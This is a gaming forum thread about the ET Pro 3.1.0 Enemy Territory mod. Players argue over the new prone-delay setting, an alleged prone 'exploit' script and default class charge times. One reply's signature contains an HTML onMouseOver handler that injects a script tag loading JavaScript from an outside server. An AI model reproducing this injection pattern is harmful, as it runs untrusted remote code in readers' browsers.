ET Pro 3.1.0 Released!

Official ET Pro announcements here...

Moderators: Forum moderators, developers

mouse

Post by mouse »

if you cant understand my point dont reply ;)

The point is, YOU can do it also. Its not a unique thing to press the button wich you have prone bound to. Thats what I mean. ET consists only of bugged boxes btw...

edit: but lets not make this another prone thread ;)
Vinyl

Post by Vinyl »

mouse wrote:if you cant understand my point dont reply ;)

The point is, YOU can do it also. Its not a unique thing to press the button wich you have prone bound to. Thats what I mean. ET consists only of bugged boxes btw...
I DO understand your point of view. Nevertheless the hitboxes when proning are "more" bugged then the "normal" ones and to use this exploit is lame in my opinion. And plz do not say that I can use this exploit, too. ;)

Just my 2 cents
>>steven!

Post by >>steven! »

[Koff3]ArseMeister wrote:
Grim|EFG wrote:Despite the fact that the prone bug script is a joke, this feature is a welcome addition imo.
Can't agree more. It's a very useful option. This prone/up/prone/up-procedure is so annoying and now there's a sane way to prevent it. Maybe we should thank whoever wrote the script, since most likely b_pronedelay wouldn't exists without it?!? And thanks to bani of course! ! :wink:
i fully agree, played 2 clan matches lastnight and was a good feature, ppl wanting to go prone for legit reasons found they could with no problems, 600 is a good figure, and ppl trying to go up down up down in firefights where just pwned. heh

any1 who doesnt like this settings, has obviously not played with it set to 600, or r serial pronin lamers, so they deserve whatever they get
Frag_Master

Post by Frag_Master »

The thing is, that ClanBase have now retracted their statement saying that server admins need to add b_pronedelay 600 to their server.cfgs, so people need to remember when they play ClanBase matches from now on to remove that from that server.cfgs if they play a CB match. Therefore, i see no point in using that setting on public servers as you might as well play on the same settings as the league that you play for, so that you are used to their settings.

Frag_Master
Vaginomano

Post by Vaginomano »

when will the admin guide updated with the new commands? :P
Deus

Post by Deus »

maybe when someone finds time for it (i guess not before ettv is done)
smoke_stack

Post by smoke_stack »

It's very simple people...
Dsky's website comment wrote: It was intended to trick some individual users in hope for an easier game.
http://www.xfire.be/?x=article&mode=item&id=29&nav=1
Anyone who uses any tactic to gain an "UNFAIR advantage" over other players is a cheater.

dsky = a bunch of cheaters.

'nuff said.
You are not a unique and individual snowflake.
We are all part of the same compost heap.
We are the all-singing, all-dancing crap of the world.
mortis

Post by mortis »

Has anyone noticed a change in default charge rates? Our players are of the opinion that the soldier charge rate is higher in etpro 3.1.0. We have not modifed charge rates manually, and I used the countdown timer to measure the following:

Solider charge time : 20 sec
With Command Post : 15 sec

Field Ops : 42 sec
with CP : 30 sec

Cov Ops with CP : 23 sec

Engineer with CP : 23 sec

Medic + CP 33 sec

Is this consistent with other 3.1.0 users, or is something awry with our server config?

--Mortis
ReyalP

Post by ReyalP »

smoke_stack wrote:It's very simple people...
Dsky's website comment wrote: It was intended to trick some individual users in hope for an easier game.
http://www.xfire.be/?x=article&mode=item&id=29&nav=1
Anyone who uses any tactic to gain an "UNFAIR advantage" over other players is a cheater.

dsky = a bunch of cheaters.

'nuff said.
Anyone who uses a supposed exploit script without understanding what it does deserves what they get, IMO. :roll:
send lawyers, guns and money
Rain

Post by Rain »

mortis wrote:Has anyone noticed a change in default charge rates? Our players are of the opinion that the soldier charge rate is higher in etpro 3.1.0. We have not modifed charge rates manually, and I used the countdown timer to measure the following:

Solider charge time : 20 sec
Default.
mortis wrote:With Command Post : 15 sec
75% of default (all the stock maps reduce charge times to 75% with a CP built.)
mortis wrote:Field Ops : 42 sec
Default + 2 seconds.
mortis wrote:with CP : 30 sec
75% of default

Covert default: 30s
mortis wrote:Cov Ops with CP : 23 sec
75% of default (22.5s)

Engineer default: 30s
mortis wrote:Engineer with CP : 23 sec
75% of default (22.5s)

Medic default: 45s
mortis wrote:Medic + CP 33 sec
75% of default (33.75s)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
dragon

Post by dragon »

Personally, I think pronefix delay is awesome. If server admins don't want to implement it, they don't have to. But we'll be doing it.

Please don't consider your time wasted on this Bani, a LOT of people appreciate your efforts.
l30

Post by l30 »

Vinyl wrote: blabla mouse. Headshots are not an exploit in ET but the bugged hitboxes when proning are.
So ask for fixed hitboxes, not nerfed prone. If the problem is m_pitch, make a toggle for it.

BTW, i want nerfed crouch+strafe, hitboxed are fubar in that case too.
deej

Post by deej »

LOL DSky aren't cheaters, they just made a modified script as a joke which noobs accepted blindly... I agree 100% with reyal_IP on this.

We now test-ran pronedelay at 200, 300, 400 & 600 and personally I think if we implement it it will be at 300 max. 400 & 600 are a bit too long IMO and it is also negative for people who use prone legitimately (i.e. to plant mines / dynamite or to lie down when shooting from a distance).

I certainly don't consider implmenting this pronedelay feature a waste of time for the ETPro crew and find this version of ETPro one of the best released up till now. Keep it up guys!
Our servers now run on 64 bit steroids. Point your ET to:
- Forgotten Ground StopWatch Server with occasional wolfrof 1
- Fraggle Rock ETPub Server - Mix up ET/UT & Duke Nukem
[Koff3]ArseMeister

Post by [Koff3]ArseMeister »

Frag_Master wrote:so people need to remember when they play ClanBase matches from now on to remove that from that server.cfgs if they play a CB match.
Is there a really need to remove a setting, if it's not set by CB's official config? Isn't it just considered as an optional value, that doesn't prevent normal gameplay in way or another!?
KingJackaL

Post by KingJackaL »

deej wrote:We now test-ran pronedelay at 200, 300, 400 & 600 and personally I think if we implement it it will be at 300 max. 400 & 600 are a bit too long IMO and it is also negative for people who use prone legitimately (i.e. to plant mines / dynamite or to lie down when shooting from a distance).

I certainly don't consider implmenting this pronedelay feature a waste of time for the ETPro crew and find this version of ETPro one of the best released up till now. Keep it up guys!
Hear hear.

Yeah, I've come to a similar conclusion. 600 does stop the script from having any effect, sure - but it's just intrusive, and would prove overly frustrating for players (more so than any of the other prone problems).

I've been testing it on 300, and it seems ok there. Short enough to be almost indistinguishable in the 200-300 range, yet large enough to make prone less usefull for straight yo-yo fighting. ;)

Tis good!